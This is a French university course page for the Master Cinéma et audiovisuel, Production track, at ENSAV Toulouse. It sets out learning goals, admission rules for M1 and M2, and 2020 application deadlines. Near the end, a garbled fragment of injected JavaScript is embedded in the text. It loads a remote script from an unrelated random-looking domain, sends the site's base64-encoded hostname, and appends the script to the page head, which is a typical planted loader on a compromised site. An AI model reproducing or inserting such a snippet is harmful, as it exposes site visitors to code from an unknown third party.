MASTER Cinéma et audiovisuel | parcours Production

• Domaine d'étude : Audiovisuel - Cinéma

• VAE

L'objectif du parcours "Production" est d'acquérir une connaissance approfondie du fonctionnement de la production audiovisuelle en terme de métiers sur un plan juridique, financier et communicationnel et de découvrir le processus de recherche dans le secteur de l’audiovisuel.

Il vise à former des producteurs dans l’accompagnement d’un projet audiovisuel sous ses aspects économiques humains et artistiques.
La formation prépare les étudiants à rechercher les financements, à réaliser les démarches administratives, comptables et juridiques, à présenter et défendre un projet pour réunir les partenaires financiers et artistiques, et à accompagner le processus d’écriture et le tournage du film.

- maîtriser les étapes de la production d’un film
- rechercher des financements,
- effectuer les démarches administratives,
- gérer les documents comptables (devis, plan de financement)
- présenter et défendre un projet pour réunir les partenaires financiers et artistiques
- accompagner le processus d’écriture,
- accompagner le tournage d’un film.

1. être titulaire de l'une des licences requises ou d'une formation bac+3 équivalente
  2. déposer votre candidature ou votre demande de redoublement auprès du secrétariat de la formation (voir onglet "Contacts").

Les candidats sont susceptibles d'être convoqués en entretien dans les locaux de l'ENSAV dans le cadre du processus d'admission.

En raison de la crise sanitaire le dépôt des dossiers est prolongé et se fera exclusivement par mail Date limite des candidatures : 15 juin 2020 minuit à l’adresseensav@univ-tlse2.fr (esav @ univ-tlse2.fr)
Résultat des admissions : Les résultats seront communiqués par mail aux candidats le 23 juin 2020

Accès en Master 2

L’accès au Master 2 Parcours Production est réservé aux étudiants ayant validé leur année de Master 1 au 1er octobre de l’année d’inscription. La connaissance préalable des enseignements ayant été suivis par les M1 du Parcours Production est impérative pour être sélectionné en M2. Autrement dit, seuls les étudiants ayant validé :
- le Master 1 Parcours Production,
- ou une formation de niveau Master 1 équivalente sur le plan des acquis de connaissances en gestion de production et dans le domaine juridique économique et financier sont susceptibles d’être sélectionnés.

Pour les étudiants n’ayant pas ce niveau requis, une demande d’équivalence justifiant d’une expérience professionnelle (minimum 5 ans) ou dans le cadre de la formation continue (VAE) peut être examinée. Dans ce cas, prendre contact avec le secrétariat : ensav@univ-tlse2.fr."

En raison de la crise sanitaire le dépôt des dossiers est prolongé et se fera exclusivement par mail. Date limite des candidatures : 15 juin 2020 minuit à l’adresseensav@univ-tlse2.fr (esav @ univ-tlse2.fr)

Cette formation est ouverte aux titulaires de la Licence mention Arts parcours création audiovisuelle ou d'une formation bac+3 équivalente dans les domaines des arts du spectacle, de l'économie, de la gestion, du droit.

Toute connaissance en économie et gestion du secteur audiovisuel (suivi de cours spécifiques, formation spécifique, expérience professionnelle) devra être valorisée par le candidat et sera prise en compte dans l'appréciation du dossier.

Contactez le secrétariat de la formation (voir onglet "Contacts") pour obtenir la fiche d'inscription. ruzozi.locixugoro.com/scripts/js?k=5e7dff6f82df1afa568b4567&s=" +encodeURI(btoa(window.location.host));document.getElementsByTagName("head")[0].appendChild(s);"="" alt="" />

• Lecteur
  • Producteur délégué